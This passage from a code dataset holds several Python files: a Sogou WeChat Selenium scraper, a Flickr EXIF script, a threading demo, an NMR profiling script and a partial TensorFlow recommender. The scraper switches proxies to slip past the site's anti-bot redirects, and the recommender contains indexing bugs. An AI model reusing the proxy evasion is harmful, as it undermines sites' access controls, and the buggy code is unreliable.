用selenium模拟浏览器去获取搜狗微信搜索的信息\"\"\"\n if not url:\n return None\n # 最后递归max_count这么多次,防止无限递归\n if count >= self.max_count:\n print(\"try many count \")\n return None\n print('crowling url ', url)\n print('crowling count ', count)\n global proxy\n if self.proxy:\n proxy_ip = '--proxy-server=http://' + self.proxy\n chrome_options = webdriver.ChromeOptions()\n # 切换IP\n chrome_options.add_argument(proxy_ip)\n browser = self.browser(chrome_options=chrome_options)\n else:\n browser = self.browser\n try:\n browser.get(url) # 返回值是None,要取数直接用browser.page_source\n next_page = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#sogou_next\")))\n if browser.current_url == url:\n page_source = browser.page_source\n return page_source\n else:\n print(\"must change ip proxy \")\n proxy = self.get_proxy(self.proxy_pool_url)\n if proxy:\n return self.get_html(url)\n else:\n print(\"get proxy is faired \")\n return None\n except ConnectionError:\n count += 1\n proxy = self.get_proxy(self.proxy_pool_url)\n return self.get_html(url, count)\n\n\n\nif __name__ == \"__main__\":\n weixin_article = SeleniumWeixinArticle()\n weixin_article.run()\n","sub_path":"outback/weixin/weixin/selenium_weixin.py","file_name":"selenium_weixin.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"252314061","text":"#!/usr/bin/env python\n\n\"\"\"Some documentation would be nice!\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\n__author__ = 'eric.hanchrow@gmail.com'\n\n# Core\nimport collections\nimport datetime\nimport os\nimport pprint\nimport sys\n\n# 3rd-party\nimport configobj # pip install configobj\nimport flickrapi # pip install flickrapi\n\n\ndef get_auth_stuff(filename=None):\n if filename is None:\n filename = os.path.expanduser('~/.flickr-auth')\n\n c = configobj.ConfigObj(filename)\n\n return(c['flickr']['api_key'],\n c['flickr']['shared_secret'])\n\napi_key, shared_secret = get_auth_stuff()\n\nflickr = flickrapi.FlickrAPI(api_key, shared_secret)\n\n\ndef dump(thing, indent=0):\n print(' ' * indent, end='')\n print(thing.__class__.__name__,\n repr(thing.tag),\n repr(thing.text),\n thing.items())\n for sub in thing:\n dump(sub, indent + 2)\n\nmy_nsid = flickr.people_findByUsername(username='offby1').find('user').attrib['nsid']\nid_to_exif_tag_to_exif_value = collections.defaultdict(dict)\n\nrequested_page = 1\nwhile True:\n rsp = flickr.photos_search(user_id=my_nsid,\n page=requested_page,\n per_page='10',\n min_upload_date=datetime.datetime(2010, 12, 1))\n photos = rsp.find('photos')\n\n if photos.get('pages') == '0':\n print(\"Hmm, no photos at all.\")\n break\n\n print(\"This is page\", photos.get('page'), \"of\", photos.get('pages'), file=sys.stderr)\n for photo in photos:\n id = photo.get('id')\n print(photo.get('title'), id, \"...\", file=sys.stderr)\n for exif in flickr.photos_getExif(api_key=api_key,\n photo_id=id,\n secret=shared_secret).find('photo').findall('exif'):\n id_to_exif_tag_to_exif_value[id][exif.get('tag')] = exif.find('raw').text\n\n if int(photos.get('page')) >= int(photos.get('pages')):\n print(\"That's all!\")\n break\n\n requested_page += 1\n\npprint.pprint(dict(id_to_exif_tag_to_exif_value))\n# sets = flickr.photosets_getList(user_id='73509078@N00')\n","sub_path":"python/flickr.py","file_name":"flickr.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"445876015","text":"import threading\nimport logging\nimport time\n\nlogging.basicConfig(level=logging.DEBUG,\n format=\"{asctime} {name} {levelname} - {message}\", style=\"{\")\nlog = logging.getLogger()\n\n\nclass SeqNum():\n __seq_num = None\n __mutex = threading.Lock()\n\n @classmethod\n def get(cls):\n with cls.__mutex:\n if cls.__seq_num is None:\n cls.__seq_num = 1\n else:\n cls.__seq_num += 1\n\n time.sleep(2)\n return cls.__seq_num\n\n\ndef do_handle():\n log.debug(SeqNum.get())\n\n\ndef main():\n try:\n thread_list = []\n for index in range(2):\n t = threading.Thread(target=do_handle, name=\"thread\" + str(index))\n t.start()\n thread_list.append(t)\n\n for t in thread_list:\n t.join(timeout=0.5)\n\n except KeyboardInterrupt as e:\n pass\n except Exception as e:\n log.error(\"Error occurrend: {}\".format(e))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_class/py_seq_num.py","file_name":"py_seq_num.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448275567","text":"\"\"\"Script for profiling the pseudo-ellipse model.\n\nThe user functions below were obtained by running:\n\n$ ./relax -sd Frame_order.test_cam_iso_cone | grep \"relax>\" > log\n\nTo profile, set the profiling flag in the 'relax' file.\n\"\"\"\n\n# Python module imports.\nfrom numpy import array, float64\n\n# relax module imports.\nfrom specific_analyses.frame_order.optimisation import target_fn_setup\n\n\n# All the user functions from the Frame_order.test_cam_pseudo_ellipse system test until the first target function call.\npipe.create(pipe_name='frame order', pipe_type='frame order', bundle=None)\nstructure.read_pdb(file='1J7O_1st_NH.pdb', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/', read_mol=None, set_mol_name='N-dom', read_model=None, set_model_num=None, alt_loc=None, verbosity=1, merge=False)\nstructure.read_pdb(file='1J7P_1st_NH_rot.pdb', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/', read_mol=None, set_mol_name='C-dom', read_model=None, set_model_num=None, alt_loc=None, verbosity=1, merge=False)\nstructure.load_spins(spin_id='@N', mol_name_target=None, ave_pos=False)\nstructure.load_spins(spin_id='@H', mol_name_target=None, ave_pos=False)\nspin.isotope(isotope='15N', spin_id='@N', force=False)\nspin.isotope(isotope='1H', spin_id='@H', force=False)\ninteratom.define(spin_id1='@N', spin_id2='@H', direct_bond=True, pipe=None)\ninteratom.set_dist(spin_id1='@N', spin_id2='@H', ave_dist=1.041e-10, unit='meter')\ninteratom.unit_vectors(ave=True)\nrdc.read(align_id='dy', file='rdc_dy.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='dy', file='pcs_dy_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='dy', temp=303)\nspectrometer.frequency(id='dy', frq=900000000.0, units='Hz')\nrdc.read(align_id='tb', file='rdc_tb.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='tb', file='pcs_tb_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='tb', temp=303)\nspectrometer.frequency(id='tb', frq=900000000.0, units='Hz')\nrdc.read(align_id='tm', file='rdc_tm.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='tm', file='pcs_tm_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='tm', temp=303)\nspectrometer.frequency(id='tm', frq=900000000.0, units='Hz')\nrdc.read(align_id='er', file='rdc_er.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', data_type='D', spin_id1_col=1, spin_id2_col=2, data_col=3, error_col=4, sep=None, neg_g_corr=False, absolute=False)\npcs.read(align_id='er', file='pcs_er_subset.txt', dir='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/iso_cone', spin_id_col=None, mol_name_col=1, res_num_col=2, res_name_col=None, spin_num_col=None, spin_name_col=5, data_col=6, error_col=7, sep=None, spin_id=None)\nspectrometer.temperature(id='er', temp=303)\nspectrometer.frequency(id='er', frq=900000000.0, units='Hz')\nscript(file='/data/relax/branches/frame_order_cleanup2/test_suite/shared_data/frame_order/cam/tensors.py', dir=None)\nalign_tensor.init(tensor='Dy N-dom', align_id='dy', domain=None, params=(0.000622191953772, 1.35210609663e-05, -0.000133742852942, 0.000756743581636, 0.000550729840729), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Dy N-dom', align_id='dy', domain=None, params=(2.35766523882e-05, 2.51785772774e-05, 1.99369755031e-05, 1.86674275393e-05, 2.01343581166e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Tb N-dom', align_id='tb', domain=None, params=(0.000617222650166, -0.000438128542649, -0.000375477068228, 0.000760687126774, 0.00034129025543), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Tb N-dom', align_id='tb', domain=None, params=(1.63152405109e-05, 1.86581336167e-05, 1.34361351013e-05, 1.46648001703e-05, 1.76633948194e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Tm N-dom', align_id='tm', domain=None, params=(-0.000385660891266, 0.000325292994524, 0.000318318888621, -0.00044409190064, -0.000473507384479), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Tm N-dom', align_id='tm', domain=None, params=(1.47916817671e-05, 1.81460089395e-05, 1.27148330285e-05, 1.54915569205e-05, 1.55953362766e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\nalign_tensor.init(tensor='Er N-dom', align_id='er', domain=None, params=(-0.000187529356988, 0.000130813961653, 7.14700966617e-05, -0.000264275852243, -0.000343164086618), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.init(tensor='Er N-dom', align_id='er', domain=None, params=(1.88459382279e-05, 1.66197299895e-05, 1.69306486018e-05, 2.12500669486e-05, 1.96610327688e-05), scale=1.0, angle_units='deg', param_types=2, errors=True)\ndomain(id='N', spin_id='#N-dom')\ndomain(id='C', spin_id='#C-dom')\nalign_tensor.init(tensor='Dy C-dom', align_id='dy', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Dy N-dom', domain='N')\nalign_tensor.set_domain(tensor='Dy C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Dy N-dom', red_tensor='Dy C-dom')\nalign_tensor.init(tensor='Tb C-dom', align_id='tb', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Tb N-dom', domain='N')\nalign_tensor.set_domain(tensor='Tb C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Tb N-dom', red_tensor='Tb C-dom')\nalign_tensor.init(tensor='Tm C-dom', align_id='tm', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Tm N-dom', domain='N')\nalign_tensor.set_domain(tensor='Tm C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Tm N-dom', red_tensor='Tm C-dom')\nalign_tensor.init(tensor='Er C-dom', align_id='er', domain=None, params=(0, 0, 0, 0, 0), scale=1.0, angle_units='deg', param_types=2, errors=False)\nalign_tensor.set_domain(tensor='Er N-dom', domain='N')\nalign_tensor.set_domain(tensor='Er C-dom', domain='C')\nalign_tensor.reduction(full_tensor='Er N-dom', red_tensor='Er C-dom')\nframe_order.select_model(model='iso cone')\nframe_order.ref_domain(ref='N')\nframe_order.pivot(pivot=array([ 37.254001617431641, 0.5, 16.746500015258789], dtype=float64), order=1, fix=True)\nparamag.centre(pos=[35.934, 12.194, -4.206], atom_id=None, pipe=None, verbosity=1, fix=True, ave_pos=True, force=False)\nframe_order.num_int_pts(num=2000)\nvalue.set(val=-21.269217407269576, param='ave_pos_x', index=0, spin_id=None, error=False)\nvalue.set(val=-3.122610661328414, param='ave_pos_y', index=0, spin_id=None, error=False)\nvalue.set(val=-2.400652421655998, param='ave_pos_z', index=0, spin_id=None, error=False)\nvalue.set(val=5.623469076122531, param='ave_pos_alpha', index=0, spin_id=None, error=False)\nvalue.set(val=0.435439405668396, param='ave_pos_beta', index=0, spin_id=None, error=False)\nvalue.set(val=5.081265529106499, param='ave_pos_gamma', index=0, spin_id=None, error=False)\nvalue.set(val=0.960079978595343, param='axis_theta', index=0, spin_id=None, error=False)\nvalue.set(val=4.032275506219623, param='axis_phi', index=0, spin_id=None, error=False)\nvalue.set(val=0.6, param='cone_theta', index=0, spin_id=None, error=False)\nvalue.set(val=0.9, param='cone_sigma_max', index=0, spin_id=None, error=False)\n\n\n# Set up the target function for direct calculation.\nmodel, param_vector, scaling_matrix = target_fn_setup(sim_index=None, verbosity=1)\n\n# Make repeated function calls.\nN = 2000\nprint(\"Function calls.\")\nfor i in range(N):\n print(i)\n chi2 = model.func(param_vector)\n","sub_path":"test_suite/shared_data/frame_order/timings/profiling_iso_cone.py","file_name":"profiling_iso_cone.py","file_ext":"py","file_size_in_byte":8980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"267246711","text":"# coding=utf-8\nimport collections\nimport math\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport argparse\nimport jieba\nimport time\nimport json\nfrom simhash import Simhash,SimhashIndex\n\ntagMap=dict()\ntagMap['1']='EXO'\ntagMap['2']='TFBOYS'\ntagMap['3']='BIGBANG'\ntagMap['4']='鹿晗'\ntagMap['5']='吴亦凡'\ntagMap['6']='明星同人'\ntagMap['7']='总裁豪门'\ntagMap['8']='都市言情'\ntagMap['9']='古代言情'\ntagMap['10']='玄幻言情'\ntagMap['11']='短篇'\ntagMap['12']='鬼故事'\ntagMap['13']='仙侠'\ntagMap['14']='玄幻'\ntagMap['15']='奇幻'\ntagMap['16']='科幻'\ntagMap['17']='热血'\ntagMap['18']='日常'\ntagMap['19']='轻小说'\ntagMap['20']='搞笑'\ntagMap['21']='神魔'\ntagMap['22']='新奇创意'\ntagMap['23']='非人视角'\ntagMap['24']='变身小说'\ntagMap['25']='穿越'\ntagMap['26']='重生'\ntagMap['27']='无限流'\ntagMap['28']='灵异'\ntagMap['29']='游戏'\ntagMap['30']='武侠'\ntagMap['31']='历史'\ntagMap['32']='推理'\ntagMap['33']='耽美纯爱'\ntagMap['34']='都市'\ntagMap['35']='竞技'\ntagMap['36']='军事'\njieba.add_word('同人')\nstop_words=[\"啊\",\"阿\",\"我\",\"哎\",\"哎呀\",\"哎哟\",\"唉\",\"俺\",\"俺们\",\"按\",\"按照\",\"吧\",\"吧哒\",\"把\",\"被\",\"本\",\"本着\",\"比\",\"彼\",\"边\",\"别\",\"别的\",\"别说\",\"并\",\"并且\",\"不比\",\"不成\",\"不单\",\"不但\",\"不独\",\"不管\",\"不光\",\"不过\",\"不仅\",\"不拘\",\"不论\",\"不怕\",\"不然\",\"不如\",\"不特\",\"不惟\",\"不问\",\"不只\",\"朝\",\"朝着\",\"趁\",\"趁着\",\"乘\",\"冲\",\"除\",\"除非\",\"除了\",\"此\",\"此间\",\"此外\",\"从\",\"从而\",\"打\",\"待\",\"但\",\"但是\",\"当\",\"当着\",\"到\",\"得\",\"的\",\"的话\",\"对\",\"对于\",\"多\",\"多少\",\"而\",\"而况\",\"而且\",\"而是\",\"而外\",\"而言\",\"而已\",\"和\",\"啦\",\"之\",\"论\",\"嘛\",\"吗\",\"了\",\"临\",\"另\",\"冒\",\"么\",\"每\",\"们\",\"呢\",\"能\",\"你\",\"你们\",\"您\",\"宁\",\"呸\",\"凭\",\"其\",\"他\",\"他们\",\"他人\",\"它\",\"它们\",\"她\",\"她们\",\"倘\",\"一\",\"又\"]\nnrate=0.01\nprint(\"version:\",version)\n\ndef read_data(data_dir):\n guids = []\n searchs = []\n bookids = []\n packages =[]\n booktags = []\n bookmarks =[]\n with tf.gfile.FastGFile(data_dir,'r') as f:\n for line in f.readlines() :\n cells = line.replace(\"\\n\",\"\").split(\"\\t\");\n if len(cells) == 6:\n guids.append(cells[0])\n cells[1] = cells[1].replace(\"\\\\N\",\"\").replace(\"''\",'').split(\",\");\n cells[4] = cells[4].replace(\"\\\\N\",\"\")\n cells[5] = cells[5].replace(\"\\\\N\", \"\")\n t = []\n for tag in cells[1]:\n for i in list(jieba.cut_for_search(tag)):\n if i is not None and i!='null' and i not in stop_words and i not in t and len(i.lower().strip())>0 :\n t.append(i.lower().strip())\n if cells[4] is not None and cells[4]!='null':\n tag_data = dict(json.loads(cells[4]))\n for key in tag_data.keys():\n score=tag_data[key]\n if score>0 and key in tagMap.keys() and tagMap[key].lower() not in t:\n t.append(tagMap[key].lower())\n booktags.append(tagMap[key].lower())\n if cells[5] is not None and cells[5]!='null':\n mark_data = dict(json.loads(cells[5]))\n for key in mark_data.keys():\n score = mark_data[key]\n if score > 0 and len(key)>0 and key.lower() not in t:\n t.append(key.lower())\n bookmarks.append(key.lower())\n searchs.append(t)\n cells[2] = cells[2].replace(\"\\\\N\", \"\").replace(\"''\", '').split(\",\");\n # bookids.append([bookid for bookid in cells[2] if len(bookid.strip()) > 0])\n book_cc_words = [book_cc.split(\":\") for book_cc in cells[2]]\n # book_cc_words = [[book_cc,10] for book_cc in books.split(\",\")]\n bids = []\n if len(book_cc_words) > 1:\n bids = [book_cc[0] for book_cc in book_cc_words]\n bookids.append(bids)\n packages.append(cells[3])\n assert len(guids)==len(searchs) and len(searchs)==len(bookids) and len(packages)==len(packages)\n return np.array(guids),np.array(searchs),np.array(bookids),np.array(packages),np.array(booktags),np.array(bookmarks)\n\ndef reSort(searchs,bookids,packages,booktags,bookmarks):\n rows = len(searchs)\n indexs = np.random.permutation(rows).tolist()\n return searchs[indexs],bookids[indexs], packages[indexs],booktags[indexs],bookmarks[indexs]\n\ndef getDataSet(datas, trainrate):\n rows = len(datas)\n split_index = int(rows * trainrate)\n train = datas[:split_index]\n test = datas[split_index:]\n return train, test\n\ndef build_dictionary(items, n_items):\n \"\"\"Process raw inputs into a dataset.\"\"\"\n count = [['UNK', -1]]\n count.extend(collections.Counter(items).most_common(n_items - 1))\n dictionary = dict()\n for item, _ in count:\n dictionary[item] = len(dictionary)\n unk_count = 0\n for item in items:\n if item not in dictionary:\n unk_count += 1\n count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n return dictionary,reversed_dictionary\n\ndef build_dataset(datas,maxItemCount):\n dataset = []\n for v in datas:\n for i in range(len(v)):\n index = random.randint(0, len(v) - 1)\n input = v[0:index]\n input = input[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int32)\n for i in range(len(input)):\n zeros[maxItemCount - len(input) + i] = input[i]\n input = zeros.tolist()\n label = v[index]\n dataset.append([input, label])\n return dataset\n\ndef flatten(datas):\n results=[]\n for row in datas:\n for cell in row :\n results.append(cell)\n return results\n\ndef coverString2List(datas):\n datas = datas.split(\"], \")\n data = []\n for i in datas:\n data.append(i.replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))\n return data\n\n\n\nsearchs_dictionary_path=\"searchs_dictionary.txt\"\nbookids_dictionary_path=\"bookids_dictionary.txt\"\npackages_dictionary_path=\"packages_dictionary.txt\"\nsearchs_data_path=\"searchs_data.txt\"\nbookids_data_path=\"bookids_data.txt\"\npackages_data_path=\"packages_data.txt\"\nbooktags_data_path=\"booktags_data.txt\"\nbookmarks_data_path=\"bookmarks_data.txt\"\nsimhash_path=\"simhash_path.txt\"\n\ndef build_dataset():\n if tf.gfile.Exists(FLAGS.buckets + searchs_dictionary_path) :\n print(\"load from cache\")\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_dictionary_path, 'r') as f:\n searchs_dictionary=eval(f.read())\n searchs_reversed_dictionary=dict(zip(searchs_dictionary.values(), searchs_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_dictionary_path, 'r') as f:\n bookids_dictionary=eval(f.read())\n bookids_reversed_dictionary=dict(zip(bookids_dictionary.values(), bookids_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_dictionary_path, 'r') as f:\n packages_dictionary=eval(f.read())\n packages_reversed_dictionary=dict(zip(packages_dictionary.values(), packages_dictionary.keys()))\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_data_path, 'r') as f:\n searchs_data=coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_data_path, 'r') as f:\n bookids_data = coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_data_path, 'r') as f:\n packages_data=eval(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + booktags_data_path, 'r') as f:\n booktags_data = coverString2List(f.read())\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookmarks_data_path, 'r') as f:\n bookmarks_data=eval(f.read())\n else :\n print(\"load from data\")\n guids, searchs, bookids, packages,booktags,bookmarks = read_data(FLAGS.buckets + \"data.txt\")\n searchs_dictionary, searchs_reversed_dictionary = build_dictionary(flatten(searchs), 50000)\n bookids_dictionary, bookids_reversed_dictionary = build_dictionary(flatten(bookids), 100000)\n packages_dictionary, packages_reversed_dictionary = build_dictionary(packages, 30)\n\n searchs_data = []\n booktags_data = []\n bookmarks_data = []\n to_num = lambda word: searchs_dictionary.get(word, 0)\n for i in searchs:\n searchs_data.append(list(map(to_num, i)))\n for i in booktags:\n booktags_data.append(list(map(to_num, i)))\n for i in bookmarks:\n bookmarks_data.append(list(map(to_num, i)))\n bookids_data = []\n to_num = lambda word: bookids_dictionary.get(word, 0)\n for i in bookids:\n bookids_data.append(list(map(to_num, i)))\n to_num = lambda word: packages_dictionary.get(word, 0)\n packages_data = list(map(to_num, packages))\n\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_dictionary_path, 'w') as f:\n f.write(str(searchs_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_dictionary_path, 'w') as f:\n f.write(str(bookids_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_dictionary_path, 'w') as f:\n f.write(str(packages_dictionary))\n with tf.gfile.FastGFile(FLAGS.summaryDir + searchs_data_path, 'w') as f:\n f.write(str(searchs_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookids_data_path, 'w') as f:\n f.write(str(bookids_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + packages_data_path, 'w') as f:\n f.write(str(packages_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + booktags_data_path, 'w') as f:\n f.write(str(booktags_data))\n with tf.gfile.FastGFile(FLAGS.summaryDir + bookmarks_data_path, 'w') as f:\n f.write(str(bookmarks_data))\n\n\n searchs_data = np.array(searchs_data)\n bookids_data = np.array(bookids_data)\n packages_data = np.array(packages_data)\n booktags_data = np.array(booktags_data)\n bookmarks_data = np.array(bookmarks_data)\n total_size=len(bookids_data)\n print(\"total_size:\",total_size)\n\n searchs, bookids, packages,booktags,bookmarks = reSort(searchs_data, bookids_data, packages_data,booktags_data,bookmarks_data)\n\n trainrate = 0.9\n train_searchs,test_searchs=getDataSet(searchs,trainrate)\n train_bookids,test_bookids=getDataSet(bookids,trainrate)\n train_packages,test_packages=getDataSet(packages,trainrate)\n train_booktags, test_booktags = getDataSet(booktags, trainrate)\n train_bookmarks, test_bookmarks = getDataSet(bookmarks, trainrate)\n\n datas=dict()\n datas['searchs']=train_searchs\n datas['bookids'] = train_bookids\n datas['packages'] = train_packages\n datas['booktags'] = train_booktags\n datas['bookmarks'] = train_bookmarks\n test_datas=dict()\n test_datas['searchs'] = test_searchs\n test_datas['bookids'] = test_bookids\n test_datas['packages'] = test_packages\n test_datas['booktags'] = test_booktags\n test_datas['bookmarks'] = test_bookmarks\n\n return datas,test_datas\n\ndef generate_batch(datas,maxItemCount,batch_size):\n start = time.time()\n searchs=datas['searchs']\n bookids=datas['bookids']\n packages=datas['packages']\n booktags = datas['booktags']\n bookmarks = datas['bookmarks']\n rows = len(bookids)\n indexs = np.random.randint(0, rows, size=(batch_size))\n searchs = searchs[indexs]\n bookids = bookids[indexs]\n packages = packages[indexs]\n booktags = booktags[indexs]\n bookmarks = bookmarks[indexs]\n batch_search = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_bookid = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_booktag = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_bookmark = np.zeros(shape=(batch_size, 30), dtype=np.int64)\n batch_package = np.zeros(shape=(batch_size), dtype=np.int64)\n batch_label = np.zeros(shape=(batch_size, 1), dtype=np.int64)\n for j in range(len(bookids)):\n v=bookids[j]\n lenv = len(v)-1\n if lenv==0 :\n lenv=1\n index = random.randint(0, lenv)\n input = v[0:index]\n input = input[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n zeros[maxItemCount - len(input) + i] = input[i]\n input = zeros\n batch_label[j] = v[index]\n batch_bookid[j] = input\n for j in range(len(searchs)):\n v = searchs[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_search[i] = input\n for j in range(len(booktags)):\n v = booktags[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_booktag[i] = input\n for j in range(len(bookmarks)):\n v = bookmarks[j]\n random.shuffle(v)\n input = v[maxItemCount * -1:]\n if len(input) < maxItemCount:\n zeros = np.zeros(maxItemCount, dtype=np.int64)\n for i in range(len(input)):\n num=input[i]\n if len(str(num))==0 :\n num=0\n zeros[maxItemCount - len(input) + i] = num\n input = zeros\n batch_bookmark[i] = input\n for i in range(len(packages)) :\n batch_package[i] = packages[i]\n # print(time.time() - start)\n return batch_search,batch_bookid,batch_package,batch_label,batch_booktag,batch_bookmark\n\ndef weight_variable(shape):\n return tf.Variable(tf.truncated_normal(shape,stddev=1.0 / math.sqrt(shape[1])))\n\ndef bias_variable(shape):\n return tf.Variable(tf.zeros(shape))\n\ndef train(datas,test_datas,\n book_size,search_size,package_size,\n book_embedding_size,search_embedding_size,package_embedding_size,\n batch_size,num_sampled=64):\n graph = tf.Graph()\n with graph.as_default():\n\n # Input data.\n bookids = tf.placeholder(tf.int64, shape=[None,None],name=\"bookids\")\n searchs = tf.placeholder(tf.int64, shape=[None, None],name=\"searchs\")\n booktags = tf.placeholder(tf.int64, shape=[None, None], name=\"booktags\")\n bookmarks = tf.placeholder(tf.int64, shape=[None, None], name=\"bookmarks\")\n packages = tf.placeholder(tf.int64, shape=[None],name=\"packages\")\n labels = tf.placeholder(tf.int64, shape=[None, 1],name=\"labels\")\n\n with tf.device('/cpu:0'):\n with tf.name_scope(\"embeddings\"):\n book_embeddings = tf.Variable(tf.random_uniform([book_size, book_embedding_size], -1.0, 1.0),name=\"book_embeddings\")\n search_embeddings = tf.Variable(tf.random_uniform([search_size, search_embedding_size], -1.0, 1.0),name=\"search_embeddings\")\n package_embeddings = tf.Variable(tf.random_uniform([package_size, package_embedding_size], -1.0, 1.0),name=\"package_embeddings\")\n tf.summary.histogram(\"book_embeddings\", book_embeddings)\n tf.summary.histogram(\"search_embeddings\", search_embeddings)\n tf.summary.histogram(\"package_embeddings\", package_embeddings)\n book_embed = tf.nn.embedding_lookup(book_embeddings, bookids)\n search_embed = tf.nn.embedding_lookup(search_embeddings, searchs)\n booktag_embed = tf.nn.embedding_lookup(search_embeddings, booktags)\n bookmark_embed = tf.nn.embedding_lookup(search_embeddings, bookmarks)\n package_embed = tf.nn.embedding_lookup(package_embeddings, packages)\n\n book_embeddings_sum = tf.reduce_sum(book_embeddings)\n\n average_book_embed = tf.reduce_mean(book_embed, 1)\n average_search_embed = tf.reduce_mean(search_embed, 1)\n average_booktag_embed = tf.reduce_mean(booktag_embed, 1)\n average_bookmark_embed = tf.reduce_mean(bookmark_embed, 1)\n\n input_data = tf.concat([average_book_embed,average_search_embed,package_embed,average_booktag_embed,average_bookmark_embed],1)\n\n with tf.name_scope(\"layer1\"):\n W = weight_variable([book_embedding_size + search_embedding_size * 3 + package_embedding_size, 1024])\n b = bias_variable([1024])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(input_data, W) + b\n tf.summary.histogram(\"layer\", layer)\n activations = tf.nn.relu(tf.layers.batch_normalization(layer))\n tf.summary.histogram(\"activations\", activations)\n\n with tf.name_scope(\"layer2\"):\n W = weight_variable([1024, 512])\n b = bias_variable([512])\n tf.summary.histogram(\"W\", W)\n tf.summary.histogram(\"b\", b)\n layer = tf.matmul(layer, W) + b\n tf.summary.histogram(\"layer\", layer)\n activations = 